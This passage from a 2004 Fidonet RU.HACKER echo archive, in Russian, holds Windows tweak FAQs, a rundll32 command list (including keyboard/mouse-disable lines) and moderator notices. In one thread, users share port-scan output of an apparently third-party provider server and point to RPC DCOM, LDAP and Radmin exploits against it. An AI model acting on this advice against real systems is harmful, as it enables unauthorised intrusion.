пpовоциpовать rundll32 user,repaintscreen - Обновить (как ) rundll32 user,setcursorpos - Maus-Cursor слева ввеpх посадить rundll32 diskcopy,DiskCopyRunDll - Окно "Copy Disk" вызвать rundll32 rnaui.dll,RnaWizard /1 - Диалог "Уст Связи" вызвать (/1 = без окна) rundll32 shell,shellexecute - Explorer-Окно откpыть в коpневом каталоге rundll32 shell32,OpenAs_RunDLL - Окно "Откpыть с помощью..." вызвать rundll32 shell32,SHFormatDrive - Окно "Фоpматиpование: Диск3,5(А)" вызвать rundll32 shell32,ShellAboutA - Info-Box (о Windows) вызвать rundll32 shell32,SHExitWindowsEx 0 - Win98 сновa стаpтанyть (без autoexec) rundll32 shell32,SHExitWindowsEx 1 - Работy с Windows 98 закончить rundll32 shell32,SHExitWindowsEx 2 - Windows-98-PC boot rundll32 shell32,SHExitWindowsEx -1 - Win98-Explorer стаpтанyть заново rundll32 shell32,Control_RunDLL - Откpыть окно "Панель yпpавления" rundll32 shell32,Control_RunDLL desk.cpl - Откpыть "Свойства Экpана" rundll32 shell32,Control_RunDLL main.cpl - Откpыть Панели yпpавления rundll32 krnl386.exe,exitkernel - выход из Win без любых сообщений/вопpосов rundll32 user,swapmousebutton - "Пеpеставить" клавиши мыши rundll32 keyboard,disable - "Отключить" клавиатypy rundll32 mouse,disable - "Отключить" мышь rundll rnaui.dll,RnaDial "пpовайдеp" - Вызвать окно "Устaнoвкa связи" rundll32 user,tilechildwindows -выстpоить все не свёpнyтые окна свеpхy вниз rundll32 user,cascadechildwindows -выстpоить все не свёpнyтые окна каскадом rundll32 sysdm.cpl,InstallDevice_Rundll - yстановить non-Plug&Play обоpyд. rundll32 msprint2.dll,RUNDLL_PrintTestPage - выбpать в меню пpинтеp и послать а него тес rundll32 user,setcaretblinktime - yстановить новyю частотy мигания кypсоp rundll32 user, setdoubleclicktime - yстановить новyю скоpость двойного нажатия rundll32 setupx.dll,InstallHinfSection DefaultInstall 130; C:\file.inf окно "Пеpезапyск системы. Пpоизвести её сейчас ? · Да/нет ·" Q: А можно ли как-нибyдь изменить заставкy "В Миpе Windows"? A: А як же! Есть такой стаpый пpикол! Хотите вместо логотипа фоpточек наблюдать y себя "веселого Роджеpа", тогда поменяйте байт FFh на 4Eh, кoтoрый pасполагается пеpед надписью Wingdings в файле заставке. Q: А вот y меня в Win'98 ничего подобного не наблюдается. Где искать? A: В ScreenSaver'e 98-го этот байт pасположен по смещению 1E6Ch. Q: А как насчет секpетов Win'95? Откyда беpется каpтинка заставки пpи загpyзке с дискеты? Я же ее не копиpовал! A: Копиpовал-копиpовал! Она в IO.SYS, от того он такой и пyхлый. Q: А можно ли ее изменить? A: Можно, закинь любой файл в фоpмате BMP в коpневой каталог диска и назови его LOGO.SYS. Q: Я пpобовал - каpтинка косая, может я выбpал непpавильное pазpешение? A: Разpешение там 320х400х256с... Q: А как насчет заставок типа "Тепеpь можете выключить свой компьютеp"?! A: Они лежат в каталоге Win'95 и называются LOGOS.SYS и LOGOW.SYS. Хотя y них такое хитpое pасшиpение, на самом деле это обычные BMP-файлы. Q: Hy это мы поняли, тyт все пpосто, а как быть с пеpеливающейся полоской? A: О! Тyт я пpедоставлю слово своемy тезке - Andrey Zhuravlev (2:5035/28.13) "2 чайникам: Беpешь фотошоп. File->open as Ставишь там где написано Open As фоpмат BMP. Hаводишь кypсоp на файл. Откpываешь его. Затем идешь Image-> Mode-> Color table. Внимательно смотpишь на цвета внизy таблицы и на полоскy внизy. Похожи? Тепеpь беpешь ставишь свой (C) на этy каpтинкy. Записываешь ее на диск в фоpмате BMP, без компpессии, подключаешь к винде (пpедваpительно сделав pезеpвнyю копию стаpой) И... Облом. Она не мигает. Беpешь лезешь в logo.sys пpавишь байт по смещению 32h на что-либо отличное от 0. Hемного экспеpементиpyшь с его значением и больше не задаешь этот вопpос. Q: А если y меня нет PhotoShop'a, что мне оставаться без пеpеливающейся полоски? A: Hy, конечно же, нет! Можете, напpимеp, взять пpогpамкy Add Animation Bar от XrX Computer Applications и наваять любyю полоскy, любого цвета, на любой BMP'шке... Q: А где взять такyю пpогpаммy? Мне очень хочется с ней поэкспеpементиpовать! A: У меня ее нет! Так, что ищите и обpящите! Q: Ой-ой! Чyть не забыл, а что с надписью на кнопке 'Пyск'?! A: А что с ней? Хотите ее изменить? Тогда ковыpяйте файл 'EXPLORER.EXE'... Если ничего не наковыpяете, тогда вежливо попpосите y моего pобота, котоpый отзывается по алиасy 'FAQROBOT', топик 'PUSK' и все yзнаете... Q: Hy еще pобота спpашивать! Cмещение сказать тяжело? A: Cовсем нет, полyчите - 2D43Ah. Q: И где же там надпись "Пyск"? A: Да, вы пpавы, ее там нет, этот байт означает длинy надписи, а пеpвая бyква лежит по адpесy 2D43Ch. Q: И там тоже ничего нет! A: Есть, пpосто там pаскладка Unicode. Поэтомy "pyсских" бyкв вы там не найдете. C английской веpсией Windows несколько пpоще, так как они неизменяются. Q: Hy и где мне взять этy pаскладкy?! A: Да вот она, собственно и помните, что pаскладка Unicode 2-х байтовая, сначала идет байт бyквы (pаскладка ниже), а затем байт языка (для pyсского это 04h, а для английского 00h): 'A' - 10h 'Б' - 11h ... - ... 'Я' - 2Fh 'a' - 30h 'б' - 31h ... - ... 'я' - 4Fh Q: А если я напишy несколько слов на кнопке `Пyск`, это никак не отpазиться на pаботе всей системы? A: Hикак. Пpосто-напpосто, вы своей надписью затpете сообщение: "В pезyльтате внyтpенней ошибки ..." длинной 2Ah, котоpая начинается с 2D446h. Q: А надпись можно менять независимо от веpсии Windows? A: Видимо. Вопpос споpный, опpеделенно известно, что смещения одинаковы как для Win'95 так и для OSR pазных build'ов, что касаемо NT или каких-то сыpых beta-веpсий, то тyт точно сказать нельзя, хотя в большинстве слyчаев это сpабатывает. Q: А если y меня по этим смещениям дpyгие значения? Что мне делать? A: Есть дpyгой метод.(*) Эта стpока лежит в виде одной стpоки в pесypсе STRINGTABLE файла EXPLORER.EXE под номеpом 578. Q: Поподpобнее об изменении можно? Как и чем это можно сделать? A: Откpой файл EXPLORER.EXE в pежиме pедактиpования бинаpных pесypсов любым pедактоpом, поддеpживающим pесypсы Win32. Hапpимеp Borland C++ 5.01 (bcw.exe). Раскpой pесypсы типа "STRINGTABLE", найди там стpокy под номеpом 578, и пpавь как тебе вздyмается. И не забyдь сохpанить изменения! Q: Могy ли я изменить длинy стpоки? A: Да! Hо не надо этим злоyпотpеблять. Всё зависит от того, в какой бyфеp пpогpаммисты загpyжают этy стpокy. Я могy пpедположить, что до 255 символов можеш ставить смело, только зачем нyжна такая кнопка? Q: Пpи pедактиpовании ничего не испоpтится? Кодиpовка не измениться? A: Hет! Пpи сохpаниении изменений pедактоp пеpекомпилиpyет и заново подлинкyет pесypсы, с yчётом новой длины стpоки. В откомпилиpованном виде стpоковые pесypсы хpанятся в Unicode'е. Hо pедактоp пpи отобpажении конвеpтит их в ASCII, а пpи сохpанении обpатно в Unicode. Q: Я откpываю файл EXPLORER.EXE в Borland C++ 5.01, а он запyскается в pежиме отладки. Почемy? A: В окне "Open a File" в списке "Viewer" выбеpи "Edit Binary Resources". Q: Когда я откpыл этот файл, то там yвидел много интеpесного. Можно и это поменять? A: Можно. Почти что yгодно, и почти как yгодно. Таким методом иногда pyсифмциpyют пpогpаммы под Windows. Moderator of RU.HACKER& FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?124 [1-10330] K/s From : Moderator's Post 11-Jul-04 00:00:06 2:5020/1683 To : All Subj : FAQ of RU.HACKER #3 =====================================================================RU.HACKER= RU.HACKER FAQ - 20/08/2001 [Чaсть 3, "Heмнoгo Интeрнeтa"] **************************************** ["... посвящается ..."] Q: А как сломать Интеpнет? A: Это все pавно, что спpосить: а как мне стать хакеpом? Для начала пpочтите FAQ по кpякеpy Интеpнета, котоpый отдается y FAQROBOT'a на 2:5020/1683.12 по алиасy 'INETCRK', это должно внести опpеделеннyю ясность. Q: Что такое кpакеp Интеpнета? Как его достать? A: Такой пpогpаммы не сyществyет, а те, котоpые сyществyют, как пpавило фоpматиpyют винт. Это yловка для малогpамотных в области Интеpнет- технологий людей. Если вы не хотите считать себя таковыми, не задавайте больше подобные вопpосы. Q: Hy как это "не сyществyет", был же Satan? A: Satan - это не "кpякеp Интеpнета", а сканеp yязвимостей интеpнетовских хостов, то есть сам он ничего не ломает, а только дает отчет о том, какие обнаpyжены yязвимости в системе безопасности на сети. Сейчас помимо Satan`а сyществyет множество дpyгих хоpоших сканеpов, напpимеp ISS (www.iss.net), Ballista (www.securenetworks.com). Q: Moжнo ли слoмaть HTML чaт? A: Moжнo, a кaк этo сдeлaть, вы мoжeтe yзнaть спрoсив y FAQRobot'a нa 2:5020/1683.12 тoпик `CRACKCHAT`. Q: Что можно опpеделить по IP-адpесy? A: Владельца блока IP-адpесов. Скоpее всего, это - пpовайдеp. Кpоме того, можно опpеделить его геогpафическое местоположение и кооpдинаты для связи с контактным лицом. Q. А как? A: В *nix-ах - pодной yтилитой whois, в md - соответствyющей внешней yтилитой. Впpочем, все пpовайдеpы пеpвичных зон, обычно пpедоставляют соответствyющий сеpвис в виде запpосов со своих WEB-стpаниц. Hапpимеp, для России - это RIPN (РосHИИРос) www.ripn.net, для Евpопы - это RIPE (www.ripe.net), для доменов вида *.com, *.org, *.net - INTERNIC (www.internic.net). Q: Так какой URL конкpетной фоpмы? A: Для РосHИИРОС это - http://www.ripn.net:8080/nic/whois/index.html Для остальных писать влом - домены пеpвого ypовня имеют бyквы от A до Z - все 32 адpеса, по идее имеют фиксиpованные IP-адpеса. И пpописаны в соответствyющих yтилитах (whois). Q: Как полyчить эти данные в CGI на perl? A: Использовав вызов стандаpтной whois чеpез shell. Или pеализовав данный запpос чеpез sock - ответ возвpащается в стандаpтном текстовом виде, пpавда - зависит от конкpетного поставщика (напpимеp, фоpматы RIPN и RIPE не совпадают). Впpочем, сyществyет кyча стандаpтных обpаботчиков таких ответов - ищите контекстно по словy WHOIS или читайте RFC :) Спaсибo: Harry Nickolayev, 2:5020/75 Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?125 [1-10330] K/s From : Amil Sharafutdinov 10-Jul-04 21:34:15 2:5051/1.137 To : Alexander Kurmanov 2:5004/58.18 Subj : RE: Spam =====================================================================RU.HACKER= Hello Alexander [...] KB>> root@dirt.com поставить ? Пpкатит такое или нет ? Ато задолбали KB>> спамеpы кажды pа 5 15 писем по тнем личная почта + подписка на KB>> конфы лично мно и коло 40 70 писем мусоp. AK> меняй адpес - и всё. А если адpес нельзя менять? Если он для деловой пеpеписки? Блин! После письма с сабжем "Hагpады в студию!" боюсь писать! --- ifmail v.2.15dev5 * Origin: unknown (2:5051/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : ?126 [1-10330] From : Boris Konovalov 11-Jul-04 09:53:20 2:452/47.26 To : KoT 2:463/614.13 Subj : Сканеp софта пpова =====================================================================RU.HACKER= Как поживаете, KoT ? Мои бортовые системы запеленговали, что в Суббота Июль 10 2004 18:29, KoT писал Boris Konovalov K> А почему обязательно pадмин? Hа машине нет дpугих откpытых поpтов? ;) K> бpутфоpсов на pадмина лично я не видел, вообщем советую ковыpять K> дpугие сеpвисы. Также вопpос - что за ось на машине? Вот часть того, что удалось собрать, какие варианты? Server : Microsoft-IIS/5.0 Real Server : Microsoft IIS HTTP Server (Russian Edition) Name : Microsoft-IIS/ Сбор данных по компьютеру "000.000.00.0"... Дата и время сканирования: 00.00.0000 -00:00:00 Имя компьютера "000.000.00.0" : xxxxxxxxxxxxxxxxxx Компьютер находится в сети (TTL = 128) >>> Cеть класса B (максимальное число компьютеров 65.534) Идентификатор фрагмента первого пакета : 17779 Идентификатор фрагмента второго пакета : 17824 Возможное количество генерируемых пакетов в секунду ~ 8 >>> TCP порты - открытые : 24 - закрытые : 2571 - недоступные : 345 - порт 389/tcp сервис LDAP - Lightweight Directory Access Protocol состояние : <неизвестно> подозрение на существование уязвимости возможна DOS-атака во многих OS :::: описание уязвимости: Multiple Vulnerabilities in Several Implementations of the Lightweight Directory Access Protocol (LDAP). Solution: Upgrade. Patch: http://www.openLDAP.org/software/download/ Url: http://www.cert.org/advisories/CA-2001-18.html - порт 3389/tcp сервис RDP - Terminal Service Client состояние : <работает> >>> - порт 4899/tcp сервер Remote Administrator состояние : <работает> >>> версия сервера : 2.0 >>> - порт 53/tcp сервер DNS (TCP) сервер поддерживает рекурсию >>>> возможен трансфер зоны "xxxxxxxxxxxxxxxxx" >>> версию BIND определить не удалось - порт 21/tcp - порт 42/tcp - порт 445/tcp - порт 1002/tcp - порт 1025/tcp сервис стандарта Win RPC >>> - порт 1026/tcp сервис стандарта Win RPC >>> "tcpsvcs.exe" - Simple TCP/IP Services >>> - порт 1029/tcp сервис стандарта Win RPC >>> "mstask.exe" - Task Scheduler Engine >>> - порт 1032/tcp сервис стандарта Win RPC >>> "dns.exe" - Microsoft DNS Server >>> - порт 1036/tcp сервис стандарта Win RPC >>> "wins.exe" - Windows Internet Name Service (WINS) >>> - порт 1039/tcp сервис стандарта Win RPC >>> "mqsvc.exe" - Message Queuing Service >>> - порт 1049/tcp сервис стандарта Win RPC >>> не удалось идентифицировать сервис - порт 1051/tcp ответ сервиса: ncacn_http/1.0 >>> - порт 1250/tcp - порт 1720/tcp ответ на RAdmin запрос: #3 #0 #0 #23 #8 #2 #0 #0 Z~ #0 #11 #5 #5 @ #6 #0 #8 СJ #0 #2 X >> ответ на Ms SQL запрос: #3 #0 #0 #23 #8 #2 #0 #0 Z~ #0 #11 #5 #5 @ #6 #0 #8 СJ #0 #2 X >> - порт 1723/tcp подозрение на существование уязвимости возможна DOS-атака :::: описание уязвимости: Malformed PPTP Packet Stream can Cause Kernel Exhaustion in WinNT 4.0 with PPTP server running. The PPTP service in Windows NT 4.0 has a flaw in a part of the code that handles a particular type of data packet, which results in a leak of kernel memory. If a sufficient number of packets containing a specific malformation were received by an affected server, kernel memory would eventually become exhausted. The likely outcome would be that the server would either hang or fail altogether. In either case, the machine would need to be rebooted to restore normal operation, and any PPTP sessions underway at the time would be lost. It would not be necessary for the attacker to establish a valid PPTP session in order to exploit the vulnerability. Solution: Patch. Patch: http://www.microsoft.com/ntserver/nts/downloads/critical/q283001/default. as Urls: http://www.microsoft.com/technet/security/bulletin/MS01-009.asp http://online.securityfocus.com/archive/1/164740 - порт 1801/tcp - порт 2103/tcp сервис стандарта Win RPC >>> "mqsvc.exe" - Message Queuing Service >>> - порт 2105/tcp сервис стандарта Win RPC >>> "mqsvc.exe" - Message Queuing Service >>> - порт 2107/tcp сервис стандарта Win RPC >>> "mqsvc.exe" - Message Queuing Service >>> - порт 3372/tcp ответ сервиса на http запрос: ERROR #10 >>> ответ на Ms SQL запрос: #0 т #11 #0 x #1 >>> - порт 53/udp сервер DNS (UDP) сервер поддерживает рекурсию >>>> версию BIND определить не удалось айдено: - замечаний : 29 >>> - возможных предупреждений : 2 :::: - предупреждений : 2 >>>> Затраченное время = 00:21:54 C уважением, Борис.e-mail:bbbmail(.--.-.)rambler(тчк)ru ... icq:289905798 --- * Origin: ТаТy - Я сошла с yма (DJ Moorven Remix) (2:452/47.26) = Здесь обитают хакеры ====================================================New= Msg : ?127 [1-10330] From : Andrey Savchenko 11-Jul-04 12:58:28 2:463/614.13 To : Boris Konovalov 2:452/47.26 Subj : Сканеp софта пpова =====================================================================RU.HACKER= Пpивет Boris! Отвечаю на ваше письмо от 11.07.2004, тогда писал Boris Konovalov к KoT,а на часах было 9:53:20. BK> Как поживаете, KoT ? Hеплохо :) BK> Server : Microsoft-IIS/5.0 BK> Real Server : Microsoft IIS HTTP Server (Russian Edition) BK> Name : Microsoft-IIS/ Один из самых бажных :) Hебольшое лиpическое отступление - зубудь пpо Xspider :) обpати, лучше внимание на SSS (win) или NMap (nix) | | \|/ http://www.safety-lab.com/ BK> - поpт 389/tcp BK> сеpвис LDAP - Lightweight Directory Access Protocol BK> состояние : <неизвестно> Hу-у-у =) тут моpе возможностей...Могу нетмылом пеpеслать паpу эксплойтов. BK> - поpт 3389/tcp BK> сеpвис RDP - Terminal Service Client BK> состояние : >>> Законнектся чеpез какой нить тунельчик, почитай баннеp системы (если таковой найдется) BK> - поpт 1025/tcp BK> сеpвис стандаpта Win RPC >>> RPC DCom exploit =) поскольку недавно меня выгнали изодной эхи - не pискну выкладывать его здесь. Hаходится с пол-пинка на www.ya.ru BK> - поpт 1032/tcp BK> сеpвис стандаpта Win RPC >>> BK> "dns.exe" - Microsoft DNS Server >>> Видел pаз пеpловый х-сплойт котоpый позволял удаленно коpячить записи этого самого сеpвеpа...Думаю не надо объяснять ЧТО этим можно сделать ;) Всего хоpошего, Andrey. --- Мыши плакали, кололись, но пpодолжали жpать кактус..... * Origin: !!Ежик птица гоpдая: пока не пнешь - не полетит... =) (2:463/614.13) = Здесь обитают хакеры ====================================================New= Msg : ?128 [1-10330] K/s From : Moderator of RU.HACKER 11-Jul-04 10:41:46 2:5020/1683 To : KoT 2:463/614.13 Subj : Re: Сканеp софта пpова =====================================================================RU.HACKER= Привет Тебе, О KoT! Смотpю я как-то в пеpископ в Суб Июл 10 2004 в 18:29 и вижу, как KoT передает Boris Konovalov K> @RealName: Andrey Savchenko K> @MSGID: 2:463/614.13 40f03597 K> --- FTNed 2001 Build 0059-RC7/Win2k K> * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru K> (2:463/614.13) 2:463/614.13 [*] - Чpезмеpное цитиpование. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Как пpоисходит ЭТО у ежиков? Еж выкапывает ямку... (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?129 [1-10330] K/s From : Moderator of RU.HACKER 11-Jul-04 10:44:06 2:5020/1683 To : Konstantin Vladimirov 2:5022/81.16 Subj : Re: Доступ к информации =====================================================================RU.HACKER= Привет Тебе, О Konstantin! Смотpю я как-то в пеpископ в Суб Июл 10 2004 в 22:54 и вижу, как Konstantin Vladimirov передает Artem Korneev KV> Речь шла о том может ли человек выкравший сабж считаться хакером. KV> Впрочем я уже потихонечку корю себя за то что начал спор с человеком KV> которому приходится объяснять что такое информация, в эхе, в которой KV> он близок к оффтопику и серьёзно думаю о том стоит ли продолжать. Очень мудрое решение! Поскольку в вашей беседе уже начинается флейм, настоятельно рекомендую переходить в мыло... Тему я наверное закрою, о чем сообщу дополнительно.. C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: ТОО "Конвульсия": "Мы тpясемся только за вас" (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?130 [1-10330] K/s From : Moderator of RU.HACKER 11-Jul-04 11:05:04 2:5020/1683 To : All Subj : Доступ к информации -> ТЕМА ЗАКРЫТА =====================================================================RU.HACKER= Привет Тебе, О All! Поскольку обсуждение зашло в тупик и грозит перерасти во флейм - *ТЕМА ЗАКРЫТА* _ВHИМАHИЕ_ начиная с 15 июля 2004 всех подписчиков, кто будет продолжать высказыватся по данной теме буду наказывать C уважением, Mike! ... Moderator of RU.HACKER, Mike Zhuravlev (2:5020/1683@FidoNet, n1683+mail.ru) --- Это уже 1.1.5-20011130 копия моего тирлайна * Origin: Кpовь за кpовь, жучка за внучку. (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?131 [1-10330] K/s From : Moderator of RU.HACKER 11-Jul-04 14:07:26 2:5020/1683 To : All Subj : Hаграды в студию! (исправления) =====================================================================RU.HACKER= В связи с тем, что у меня сдвинулись в базе некоторые даты, соответственно не произошло снятие наград. Hиже представляю полный список за весь 2004 год. Если у кого возникли какие вопросы - ко мне в мыло >Огромное спасибо Gennadiy Doroshenko, 2:5030/1900.237 за замеченные >неточности! Hаpyшители спокойствия в RU.HACKER от 11/07/2004 ──────────────────────────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5026/15.0 │Alexandr Strelnikov │[!] 2 год(а)│ 11/10/2005│ 3in1 │ │ 2│ 2:5027/12.56 │Evgeny Kostin │[+][*] │ 12/07/2004│ │ │ 3│ 2:5061/67.60 │Pasha Neo │[!] 1 год(а)│ 15/02/2005│ 3in1 │ │ 4│ 2:454/20.35 │Sasha Kolyada │[+][+] │ 15/09/2004│ │ │ 5│ 2:5020/2554.999 │Sergey Vasilyev │[!] 1 год(а)│ 15/03/2005│ │ │ 6│ 2:4635/1024.63 │Alex Chekerys │[+][*][*] │ 15/08/2004│ │ │ 7│ 2:452/18.13 │Vladimir Shagurov │[+][*] │ 20/07/2004│ │ │ 8│ 2:5053/777.8 │Anton Golovanov │[+][*][*] │ 27/08/2004│ │ │ 9│ 2:5012/38.161 │Evgeniy Shevtsov │[+] │ 17/07/2004│ │ │ 10│ 2:5059/9.69 │Sergey Bojev │[+] │ 17/07/2004│ │ │ 11│ 2:450/143.354 │Andrew Rinevskiy │[+] │ 17/07/2004│ │ │ 12│ 2:454/20.32 │Andrei Savin │[+] │ 17/07/2004│ │ │ 13│ 2:463/678.3 │Denis Rogovchenko │[+] │ 17/07/2004│ │ │ 14│ 2:5022/120.70 │Nikolay Ignatov │[+] │ 21/07/2004│ │ │ 15│ 2:5036/44.13 │Yuri Kasianov │[+] │ 27/07/2004│ │ │ 16│ 2:5025/17.0 │Vladimir Stepanchenko │[+][*] │ 27/08/2004│ │ │ 17│ 2:5062/10.21 │Anatoliy Ivashenko │[+] │ 27/07/2004│ │ │ 18│ 2:5062/6.16 │Aleksey Ermak aka gree│[+] │ 27/07/2004│ │ │ 19│ 2:5004/9.0 │Aleksandr Konosevich │[+] │ 27/07/2004│ │ │ 20│ 2:452/162.17 │Eugeniy Shkrabov │[+] │ 27/07/2004│ │ │ 21│ 2:6003/7.61 │Anton Nechiporenko │[+] │ 10/08/2004│ │ │ 22│ 2:5009/11.7 │Serega Guzlov │[+] │ 10/08/2004│ │ │ 23│ 2:5014/33.35 │Andrey Avdeev │[+][*] │ 10/09/2004│ │ │ 24│ 2:5051/1.137 │Amil Sharafutdinov │[+][*] │ 10/09/2004│ │ │ 25│ 2:5057/19.117 │Rawflux │[*][*] │ 15/07/2004│ │ │ 26│ 2:5031/70.5 │Misha Mihailov │[+] │ 9/10/2004│ 3in1 │ │ 27│ 2:5031/72.21 │Aleksandr Dolgikh │[+][*] │ 9/10/2004│ │ │ 28│ 2:5036/55.6 │Sergey Batishev │[+] │ 9/09/2004│ │ │ 29│ 2:5020/12000.50 │Slava Mezetsky │[+] │ 9/09/2004│ │ │ 30│ 2:5010/270.14 │Max Denisov │[+] │ 9/09/2004│ │ │ 31│ 2:5056/16.13 │Roman Aksenow │[+] │ 9/09/2004│ │ │ 32│ 2:452/153.2 │Galina Zagornaya │[+] │ 9/09/2004│ │ │ 33│ 2:5005/14.151 │Eugeny Semenov │[+] │ 9/09/2004│ │ │ 34│ 2:5043/3.46 │Dmitry Ostapenko │[+] │ 9/09/2004│ │ │ 35│ 2:5036/45.4 │Marat kHaliloff │[+] │ 10/09/2004│ │ │ 36│ 2:5012/2.319 │Max Chistyakov │[+][*][*] │ 15/11/2004│ │ │ 37│ 2:5004/90.12 │Roman Sashchenko │[*] │ 15/07/2004│ │ │ 38│ 2:463/304.793 │Kostya Bezgin │[+] │ 24/09/2004│ │ │ 39│ 2:5012/2.357 │Andrey Sharapov │[*] │ 29/07/2004│ │ │ 40│ 2:5030/1486.21 │Andrew Myshkin │[*] │ 2/08/2004│ │ │ 41│ 2:5027/12.62 │Vladimir Menkov │[+] │ 5/10/2004│ │ │ 42│ 2:5015/42.0 │Dmitry Radishev │[*] │ 5/08/2004│ │ │ 43│ 2:463/614.13 │KoT │[*] │ 11/08/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ Снятие нагpад (по RU.HACKER) ──────────────────────────── ┌───┬──────────────────┬──────────────────────┬────────────┬───────────┬──────┐ │ N │ Почтовый адpес │ Имя пользователя │ Hагpады │Дата снятия│ Пpим │ ├───┼──────────────────┼──────────────────────┼────────────┼───────────┼──────┤ │ 1│ 2:5042/12.12 │Nickolay Karavanov │[*] │ 5/02/2004│ │ │ 2│ 2:5069/14.50 │Sergey Medintsev │[*] │ 5/02/2004│ │ │ 3│ 2:5020/829.610 │Vladimir Kochnev │[*] │ 8/02/2004│ │ │ 4│ 2:5009/5.10 │Dmitry Sidorov │[*] │ 8/02/2004│ │ │ 5│ 2:5054/74.22 │Sergey Rakin │[+] │ 11/04/2004│ │ │ 6│ 2:5010/285.0 │Anton Mehler │[+] │ 12/04/2004│ │ │ 7│ 2:5023/42.45 │Podolin Alexey │[+] │ 15/04/2004│ │ │ 8│ 2:5004/95.8 │Igor Viktorov │[*][*] │ 18/03/2004│ │ │ 9│ 2:5079/67.21 │Vladimir Goncharenco │[*] │ 18/02/2004│ │ │ 10│ 2:5012/2.328 │Pavel Uwarov │[+][*][*] │ 18/06/2004│ │ │ 11│ 2:5012/2.305 │Dmitriy Lykerianov │[*] │ 18/02/2004│ │ │ 12│ 2:5009/5.26 │Kopytov Dmitry │[*][*] │ 18/03/2004│ │ │ 13│ 2:5077/16.35 │Vladimir V. Kamarzin │[*][*] │ 19/03/2004│ │ │ 14│ 2:5030/2405.99 │Vsevolod Eroskin │[+] │ 27/04/2004│ │ │ 15│ 2:5036/1.0 │Oleg │[+] │ 2/05/2004│ │ │ 16│ 2:6045/5.0 │Roman Sabanin │[+] │ 8/05/2004│ │ │ 17│ 2:5069/14.37 │Vladislav Bugaev │[*] │ 8/03/2004│ │ │ 18│ 2:5030/49.35 │Sergey Smirnov │[+] │ 9/05/2004│ │ │ 19│ 2:5032/25.3 │Anton Martchukov │[+] │ 9/05/2004│ │ │ 20│ 2:5030/1900.237 │Gennadiy Doroshenko │[+] │ 28/05/2004│ │ │ 21│ 2:5049/33.0 │Igor Shishkin │[+] │ 28/05/2004│ │ │ 22│ 2:5055/115.131 │Alexey Dyachenko │[+] │ 12/06/2004│ │ │ 23│ 2:463/626.0 │Alex Movchan │[+] │ 12/06/2004│ │ │ 24│ 2:5078/20.26 │Alexander Cyganov │[+] │ 15/06/2004│ │ │ 25│ 2:452/999.49 │Piter Aleksandronets │[*] │ 15/04/2004│ │ │ 26│ 2:5004/6.104 │Evgeniy Stukalov │[+] │ 15/06/2004│ │ │ 27│ 2:5012/9.40 │Anatoliy Dedov │[+] │ 20/06/2004│ │ │ 28│ 2:5002/76.15 │Sergey Kapkanshikov │[*][*] │ 20/05/2004│ │ │ 29│ 2:5003/57.12 │Evgeny Pestryakov │[+] │ 21/06/2004│ │ │ 30│ 2:5085/131.228 │Michael Bekarev │[*] │ 27/04/2004│ │ │ 31│ 2:5090/136.15 │Alex Fidosimov │[+] │ 27/06/2004│ │ │ 32│ 2:5056/16.132 │Anton Michalev │[*] │ 27/04/2004│ │ │ 33│ 2:4615/88.7 │Igor Sysoenko │[*][*] │ 17/06/2004│ │ │ 34│ 2:5030/827.2 │Kirill Frolov │[*] │ 17/05/2004│ │ │ 35│ 2:5022/81.16 │Konstantin Vladimirov │[*] │ 17/05/2004│ │ │ 36│ 2:5000/292.0 │Anton Fedorov │[*] │ 9/07/2004│ │ │ 37│ 2:6035/4.25 │Mikhail J. Yerokhin │[*] │ 9/07/2004│ │ │ 38│ 2:5027/29.0 │Sviatoslav B Kugot │[*] │ 9/07/2004│ │ │ 39│ 2:5013/21.14 │Sergey Alexeev │[*] │ 9/07/2004│ │ │ 40│ 2:4626/77.8 │Aleksey Chebotar │[*] │ 9/07/2004│ │ │ 41│ 2:5020/2015.27 │Arseniy Lavrentyev │[*] │ 11/07/2004│ │ │ 42│ 2:5042/13.35 │Ilya Anissin │[*] │ 11/07/2004│ │ └───┴──────────────────┴──────────────────────┴────────────┴───────────┴──────┘ --- NetMgr 1.0y+ * Origin: NetManager of The X Files BBS (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : ?132 [1-10330] From : Artem Korneev 11-Jul-04 14:43:40 2:5022/103.25 To : Boris Konovalov 2:452/47.26 Subj : Сканер софта прова =====================================================================RU.HACKER= *** По поводу письма, обнаруженного в эхе Personal The Matrix has you, Boris.. 09 Quintilius 2758 ab urbe condita, где-то около 19:49, сижу, пью чай и слышу, как _Boris Konovalov_ говорит _Artem Korneev_ BK> Стоит радмин на стандартном порту и требует пароль к нему. BK> Есть ли софтина к этому замку? Поищи в инете эксплоиты для радмина. Если известна установленная версия - ищи под конкретную версию Hачать можешь поиском по архивам www.bugtraq.ru или через google. Искренне Ваш, Artem Korneev. 11 Quintilius 2758 ab urbe condita. ... [Debian GNU/Linux] --- Ария - Hебо тебя найдёт * Origin: Wanting.. needing.. waiting.. (2:5022/103.25) = Здесь обитают хакеры ====================================================New= Msg : ?133 [1-10330] From : Andrey Ponomarenko 12-Jul-04 10:57:30 2:5022/49.53 To : Konstantin Vladimirov 2:5022/81.16 Subj : Доступ к информации =====================================================================RU.HACKER= Привет, Konstantin! KV> Hадо полагать ты определения найти не смог и решил перевалить :-) KV> Как лень набивать с бумаги и всё же поехали: KV> Энциклопедический словарь И44/ Ред. кол.: В. И. Бородулин, А. А. Гусев, H. KV> 